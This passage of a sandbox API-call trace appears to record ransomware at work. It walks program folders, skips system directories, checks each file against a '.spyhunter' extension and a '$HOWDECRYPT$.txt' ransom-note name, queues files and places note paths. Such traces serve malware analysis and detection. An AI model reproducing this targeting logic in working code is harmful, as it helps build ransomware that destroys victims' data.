pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\NavigationRight_SelectionSubpicture.png") returned 92 [0092.938] StrStrIW (lpFirst="NavigationRight_SelectionSubpicture.png", lpSrch=".spyhunter") returned 0x0 [0092.938] lstrcmpW (lpString1="NavigationRight_SelectionSubpicture.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.938] lstrcmpW (lpString1="NavigationRight_SelectionSubpicture.png", lpString2="_uninstalling_.png") returned 1 [0092.938] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\NavigationRight_SelectionSubpicture.png") returned 92 [0092.938] GetProcessHeap () returned 0x2c0000 [0092.938] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xfa) returned 0x381880 [0092.938] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1520) returned 0x2c310e0 [0092.938] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.938] lstrcmpiW (lpString1="NavigationUp_ButtonGraphic.png", lpString2="Windows") returned -1 [0092.938] lstrlenW (lpString="Windows") returned 7 [0092.938] lstrcmpiW (lpString1="NavigationUp_ButtonGraphic.png", lpString2="$Recycle.bin") returned 1 [0092.938] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.938] lstrcmpiW (lpString1="NavigationUp_ButtonGraphic.png", lpString2="System Volume Information") returned -1 [0092.938] lstrlenW (lpString="System Volume Information") returned 25 [0092.938] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\NavigationUp_ButtonGraphic.png") returned 83 [0092.938] StrStrIW (lpFirst="NavigationUp_ButtonGraphic.png", lpSrch=".spyhunter") returned 0x0 [0092.938] lstrcmpW (lpString1="NavigationUp_ButtonGraphic.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.938] lstrcmpW (lpString1="NavigationUp_ButtonGraphic.png", lpString2="_uninstalling_.png") returned 1 [0092.938] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\NavigationUp_ButtonGraphic.png") returned 83 [0092.938] GetProcessHeap () returned 0x2c0000 [0092.938] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe8) returned 0x34ee78 [0092.938] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1528) returned 0x2c310e0 [0092.938] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.938] lstrcmpiW (lpString1="NavigationUp_SelectionSubpicture.png", lpString2="Windows") returned -1 [0092.939] lstrlenW (lpString="Windows") returned 7 [0092.939] lstrcmpiW (lpString1="NavigationUp_SelectionSubpicture.png", lpString2="$Recycle.bin") returned 1 [0092.939] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.939] lstrcmpiW (lpString1="NavigationUp_SelectionSubpicture.png", lpString2="System Volume Information") returned -1 [0092.939] lstrlenW (lpString="System Volume Information") returned 25 [0092.939] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\NavigationUp_SelectionSubpicture.png") returned 89 [0092.939] StrStrIW (lpFirst="NavigationUp_SelectionSubpicture.png", lpSrch=".spyhunter") returned 0x0 [0092.939] lstrcmpW (lpString1="NavigationUp_SelectionSubpicture.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.939] lstrcmpW (lpString1="NavigationUp_SelectionSubpicture.png", lpString2="_uninstalling_.png") returned 1 [0092.939] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\NavigationUp_SelectionSubpicture.png") returned 89 [0092.939] GetProcessHeap () returned 0x2c0000 [0092.939] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xf4) returned 0x35a260 [0092.939] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1530) returned 0x2c310e0 [0092.939] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.939] lstrcmpiW (lpString1="push.png", lpString2="Windows") returned -1 [0092.939] lstrlenW (lpString="Windows") returned 7 [0092.939] lstrcmpiW (lpString1="push.png", lpString2="$Recycle.bin") returned 1 [0092.939] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.939] lstrcmpiW (lpString1="push.png", lpString2="System Volume Information") returned -1 [0092.939] lstrlenW (lpString="System Volume Information") returned 25 [0092.939] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\push.png") returned 61 [0092.939] StrStrIW (lpFirst="push.png", lpSrch=".spyhunter") returned 0x0 [0092.939] lstrcmpW (lpString1="push.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.939] lstrcmpW (lpString1="push.png", lpString2="_uninstalling_.png") returned 1 [0092.940] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\push.png") returned 61 [0092.940] GetProcessHeap () returned 0x2c0000 [0092.940] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xbc) returned 0x32d8d8 [0092.940] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1538) returned 0x2c310e0 [0092.940] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.940] lstrcmpiW (lpString1="pushplaysubpicture.png", lpString2="Windows") returned -1 [0092.940] lstrlenW (lpString="Windows") returned 7 [0092.940] lstrcmpiW (lpString1="pushplaysubpicture.png", lpString2="$Recycle.bin") returned 1 [0092.940] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.940] lstrcmpiW (lpString1="pushplaysubpicture.png", lpString2="System Volume Information") returned -1 [0092.940] lstrlenW (lpString="System Volume Information") returned 25 [0092.940] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\pushplaysubpicture.png") returned 75 [0092.940] StrStrIW (lpFirst="pushplaysubpicture.png", lpSrch=".spyhunter") returned 0x0 [0092.940] lstrcmpW (lpString1="pushplaysubpicture.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.940] lstrcmpW (lpString1="pushplaysubpicture.png", lpString2="_uninstalling_.png") returned 1 [0092.940] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\pushplaysubpicture.png") returned 75 [0092.940] GetProcessHeap () returned 0x2c0000 [0092.940] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd8) returned 0x346648 [0092.940] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1540) returned 0x2c310e0 [0092.940] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.940] lstrcmpiW (lpString1="push_item.png", lpString2="Windows") returned -1 [0092.940] lstrlenW (lpString="Windows") returned 7 [0092.940] lstrcmpiW (lpString1="push_item.png", lpString2="$Recycle.bin") returned 1 [0092.941] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.941] lstrcmpiW (lpString1="push_item.png", lpString2="System Volume Information") returned -1 [0092.941] lstrlenW (lpString="System Volume Information") returned 25 [0092.941] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\push_item.png") returned 66 [0092.941] StrStrIW (lpFirst="push_item.png", lpSrch=".spyhunter") returned 0x0 [0092.941] lstrcmpW (lpString1="push_item.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.941] lstrcmpW (lpString1="push_item.png", lpString2="_uninstalling_.png") returned 1 [0092.941] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\push_item.png") returned 66 [0092.941] GetProcessHeap () returned 0x2c0000 [0092.941] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc6) returned 0x358060 [0092.941] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1548) returned 0x2c310e0 [0092.941] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.941] lstrcmpiW (lpString1="push_title.png", lpString2="Windows") returned -1 [0092.941] lstrlenW (lpString="Windows") returned 7 [0092.941] lstrcmpiW (lpString1="push_title.png", lpString2="$Recycle.bin") returned 1 [0092.941] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.941] lstrcmpiW (lpString1="push_title.png", lpString2="System Volume Information") returned -1 [0092.941] lstrlenW (lpString="System Volume Information") returned 25 [0092.941] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\push_title.png") returned 67 [0092.941] StrStrIW (lpFirst="push_title.png", lpSrch=".spyhunter") returned 0x0 [0092.941] lstrcmpW (lpString1="push_title.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.941] lstrcmpW (lpString1="push_title.png", lpString2="_uninstalling_.png") returned 1 [0092.941] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\push_title.png") returned 67 [0092.941] GetProcessHeap () returned 0x2c0000 [0092.941] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x358d60 [0092.942] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1550) returned 0x2c310e0 [0092.942] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0 [0092.942] FindClose (in: hFindFile=0x335fa0 | out: hFindFile=0x335fa0) returned 1 [0092.943] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\$HOWDECRYPT$.txt") returned 69 [0092.943] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\$HOWDECRYPT$.txt") returned 69 [0092.943] GetProcessHeap () returned 0x2c0000 [0092.943] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xcc) returned 0x37e638 [0092.943] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1558) returned 0x2c310e0 [0092.943] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0092.943] lstrcmpiW (lpString1="Rectangles", lpString2="Windows") returned -1 [0092.943] lstrlenW (lpString="Windows") returned 7 [0092.943] lstrcmpiW (lpString1="Rectangles", lpString2="$Recycle.bin") returned 1 [0092.943] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.943] lstrcmpiW (lpString1="Rectangles", lpString2="System Volume Information") returned -1 [0092.943] lstrlenW (lpString="System Volume Information") returned 25 [0092.943] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles") returned 58 [0092.943] lstrcmpW (lpString1="Rectangles", lpString2=".") returned 1 [0092.943] lstrcmpW (lpString1="Rectangles", lpString2="..") returned 1 [0092.943] GetProcessHeap () returned 0x2c0000 [0092.943] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c11050 [0092.943] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\*") returned 60 [0092.943] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\*", lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0x335fa0 [0092.948] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0092.948] lstrlenW (lpString="Windows") returned 7 [0092.948] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0092.948] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.948] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0092.948] lstrlenW (lpString="System Volume Information") returned 25 [0092.948] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\.") returned 60 [0092.948] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0092.948] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.949] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0092.949] lstrlenW (lpString="Windows") returned 7 [0092.949] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0092.949] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.949] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0092.949] lstrlenW (lpString="System Volume Information") returned 25 [0092.949] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\..") returned 61 [0092.949] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0092.949] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0092.949] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.949] lstrcmpiW (lpString1="1047x576black.png", lpString2="Windows") returned -1 [0092.949] lstrlenW (lpString="Windows") returned 7 [0092.949] lstrcmpiW (lpString1="1047x576black.png", lpString2="$Recycle.bin") returned 1 [0092.949] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.949] lstrcmpiW (lpString1="1047x576black.png", lpString2="System Volume Information") returned -1 [0092.949] lstrlenW (lpString="System Volume Information") returned 25 [0092.949] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\1047x576black.png") returned 76 [0092.949] StrStrIW (lpFirst="1047x576black.png", lpSrch=".spyhunter") returned 0x0 [0092.949] lstrcmpW (lpString1="1047x576black.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.949] lstrcmpW (lpString1="1047x576black.png", lpString2="_uninstalling_.png") returned 1 [0092.949] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\1047x576black.png") returned 76 [0092.949] GetProcessHeap () returned 0x2c0000 [0092.949] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xda) returned 0x3780d8 [0092.950] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1560) returned 0x2c310e0 [0092.950] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.950] lstrcmpiW (lpString1="1047x576_91n92.png", lpString2="Windows") returned -1 [0092.950] lstrlenW (lpString="Windows") returned 7 [0092.950] lstrcmpiW (lpString1="1047x576_91n92.png", lpString2="$Recycle.bin") returned 1 [0092.950] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.950] lstrcmpiW (lpString1="1047x576_91n92.png", lpString2="System Volume Information") returned -1 [0092.950] lstrlenW (lpString="System Volume Information") returned 25 [0092.950] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\1047x576_91n92.png") returned 77 [0092.950] StrStrIW (lpFirst="1047x576_91n92.png", lpSrch=".spyhunter") returned 0x0 [0092.950] lstrcmpW (lpString1="1047x576_91n92.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.950] lstrcmpW (lpString1="1047x576_91n92.png", lpString2="_uninstalling_.png") returned 1 [0092.950] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\1047x576_91n92.png") returned 77 [0092.950] GetProcessHeap () returned 0x2c0000 [0092.950] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xdc) returned 0x377ff0 [0092.950] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1568) returned 0x2c310e0 [0092.950] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.950] lstrcmpiW (lpString1="15x15dot.png", lpString2="Windows") returned -1 [0092.950] lstrlenW (lpString="Windows") returned 7 [0092.950] lstrcmpiW (lpString1="15x15dot.png", lpString2="$Recycle.bin") returned 1 [0092.950] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.950] lstrcmpiW (lpString1="15x15dot.png", lpString2="System Volume Information") returned -1 [0092.950] lstrlenW (lpString="System Volume Information") returned 25 [0092.950] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\15x15dot.png") returned 71 [0092.951] StrStrIW (lpFirst="15x15dot.png", lpSrch=".spyhunter") returned 0x0 [0092.951] lstrcmpW (lpString1="15x15dot.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.951] lstrcmpW (lpString1="15x15dot.png", lpString2="_uninstalling_.png") returned 1 [0092.951] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\15x15dot.png") returned 71 [0092.951] GetProcessHeap () returned 0x2c0000 [0092.951] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd0) returned 0x37e710 [0092.951] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1570) returned 0x2c310e0 [0092.951] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.951] lstrcmpiW (lpString1="720x480icongraphic.png", lpString2="Windows") returned -1 [0092.951] lstrlenW (lpString="Windows") returned 7 [0092.951] lstrcmpiW (lpString1="720x480icongraphic.png", lpString2="$Recycle.bin") returned 1 [0092.951] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.951] lstrcmpiW (lpString1="720x480icongraphic.png", lpString2="System Volume Information") returned -1 [0092.951] lstrlenW (lpString="System Volume Information") returned 25 [0092.951] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\720x480icongraphic.png") returned 81 [0092.951] StrStrIW (lpFirst="720x480icongraphic.png", lpSrch=".spyhunter") returned 0x0 [0092.951] lstrcmpW (lpString1="720x480icongraphic.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.951] lstrcmpW (lpString1="720x480icongraphic.png", lpString2="_uninstalling_.png") returned 1 [0092.951] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\720x480icongraphic.png") returned 81 [0092.951] GetProcessHeap () returned 0x2c0000 [0092.951] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe4) returned 0x34f148 [0092.951] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1578) returned 0x2c310e0 [0092.951] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.952] lstrcmpiW (lpString1="NavigationLeft_ButtonGraphic.png", lpString2="Windows") returned -1 [0092.952] lstrlenW (lpString="Windows") returned 7 [0092.952] lstrcmpiW (lpString1="NavigationLeft_ButtonGraphic.png", lpString2="$Recycle.bin") returned 1 [0092.952] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.952] lstrcmpiW (lpString1="NavigationLeft_ButtonGraphic.png", lpString2="System Volume Information") returned -1 [0092.952] lstrlenW (lpString="System Volume Information") returned 25 [0092.952] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\NavigationLeft_ButtonGraphic.png") returned 91 [0092.952] StrStrIW (lpFirst="NavigationLeft_ButtonGraphic.png", lpSrch=".spyhunter") returned 0x0 [0092.952] lstrcmpW (lpString1="NavigationLeft_ButtonGraphic.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.952] lstrcmpW (lpString1="NavigationLeft_ButtonGraphic.png", lpString2="_uninstalling_.png") returned 1 [0092.952] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\NavigationLeft_ButtonGraphic.png") returned 91 [0092.952] GetProcessHeap () returned 0x2c0000 [0092.952] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xf8) returned 0x35a360 [0092.952] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1580) returned 0x2c310e0 [0092.952] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.952] lstrcmpiW (lpString1="NavigationLeft_SelectionSubpicture.png", lpString2="Windows") returned -1 [0092.952] lstrlenW (lpString="Windows") returned 7 [0092.952] lstrcmpiW (lpString1="NavigationLeft_SelectionSubpicture.png", lpString2="$Recycle.bin") returned 1 [0092.952] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.952] lstrcmpiW (lpString1="NavigationLeft_SelectionSubpicture.png", lpString2="System Volume Information") returned -1 [0092.952] lstrlenW (lpString="System Volume Information") returned 25 [0092.952] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\NavigationLeft_SelectionSubpicture.png") returned 97 [0092.952] StrStrIW (lpFirst="NavigationLeft_SelectionSubpicture.png", lpSrch=".spyhunter") returned 0x0 [0092.952] lstrcmpW (lpString1="NavigationLeft_SelectionSubpicture.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.953] lstrcmpW (lpString1="NavigationLeft_SelectionSubpicture.png", lpString2="_uninstalling_.png") returned 1 [0092.953] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\NavigationLeft_SelectionSubpicture.png") returned 97 [0092.953] GetProcessHeap () returned 0x2c0000 [0092.953] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x104) returned 0x37a750 [0092.953] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1588) returned 0x2c310e0 [0092.953] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.953] lstrcmpiW (lpString1="NavigationRight_ButtonGraphic.png", lpString2="Windows") returned -1 [0092.953] lstrlenW (lpString="Windows") returned 7 [0092.953] lstrcmpiW (lpString1="NavigationRight_ButtonGraphic.png", lpString2="$Recycle.bin") returned 1 [0092.953] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.953] lstrcmpiW (lpString1="NavigationRight_ButtonGraphic.png", lpString2="System Volume Information") returned -1 [0092.953] lstrlenW (lpString="System Volume Information") returned 25 [0092.953] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\NavigationRight_ButtonGraphic.png") returned 92 [0092.953] StrStrIW (lpFirst="NavigationRight_ButtonGraphic.png", lpSrch=".spyhunter") returned 0x0 [0092.953] lstrcmpW (lpString1="NavigationRight_ButtonGraphic.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.953] lstrcmpW (lpString1="NavigationRight_ButtonGraphic.png", lpString2="_uninstalling_.png") returned 1 [0092.953] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\NavigationRight_ButtonGraphic.png") returned 92 [0092.953] GetProcessHeap () returned 0x2c0000 [0092.953] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xfa) returned 0x381988 [0092.953] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1590) returned 0x2c310e0 [0092.953] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.953] lstrcmpiW (lpString1="NavigationRight_SelectionSubpicture.png", lpString2="Windows") returned -1 [0092.953] lstrlenW (lpString="Windows") returned 7 [0092.953] lstrcmpiW (lpString1="NavigationRight_SelectionSubpicture.png", lpString2="$Recycle.bin") returned 1 [0092.954] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.954] lstrcmpiW (lpString1="NavigationRight_SelectionSubpicture.png", lpString2="System Volume Information") returned -1 [0092.954] lstrlenW (lpString="System Volume Information") returned 25 [0092.954] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\NavigationRight_SelectionSubpicture.png") returned 98 [0092.954] StrStrIW (lpFirst="NavigationRight_SelectionSubpicture.png", lpSrch=".spyhunter") returned 0x0 [0092.954] lstrcmpW (lpString1="NavigationRight_SelectionSubpicture.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.954] lstrcmpW (lpString1="NavigationRight_SelectionSubpicture.png", lpString2="_uninstalling_.png") returned 1 [0092.954] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\NavigationRight_SelectionSubpicture.png") returned 98 [0092.954] GetProcessHeap () returned 0x2c0000 [0092.954] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x106) returned 0x375928 [0092.954] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1598) returned 0x2c310e0 [0092.954] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.954] lstrcmpiW (lpString1="NavigationUp_ButtonGraphic.png", lpString2="Windows") returned -1 [0092.954] lstrlenW (lpString="Windows") returned 7 [0092.954] lstrcmpiW (lpString1="NavigationUp_ButtonGraphic.png", lpString2="$Recycle.bin") returned 1 [0092.954] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.954] lstrcmpiW (lpString1="NavigationUp_ButtonGraphic.png", lpString2="System Volume Information") returned -1 [0092.954] lstrlenW (lpString="System Volume Information") returned 25 [0092.954] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\NavigationUp_ButtonGraphic.png") returned 89 [0092.954] StrStrIW (lpFirst="NavigationUp_ButtonGraphic.png", lpSrch=".spyhunter") returned 0x0 [0092.954] lstrcmpW (lpString1="NavigationUp_ButtonGraphic.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.954] lstrcmpW (lpString1="NavigationUp_ButtonGraphic.png", lpString2="_uninstalling_.png") returned 1 [0092.954] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\NavigationUp_ButtonGraphic.png") returned 89 [0092.954] GetProcessHeap () returned 0x2c0000 [0092.955] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xf4) returned 0x35a460 [0092.955] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x15a0) returned 0x2c310e0 [0092.955] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.955] lstrcmpiW (lpString1="NavigationUp_SelectionSubpicture.png", lpString2="Windows") returned -1 [0092.955] lstrlenW (lpString="Windows") returned 7 [0092.955] lstrcmpiW (lpString1="NavigationUp_SelectionSubpicture.png", lpString2="$Recycle.bin") returned 1 [0092.955] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.955] lstrcmpiW (lpString1="NavigationUp_SelectionSubpicture.png", lpString2="System Volume Information") returned -1 [0092.955] lstrlenW (lpString="System Volume 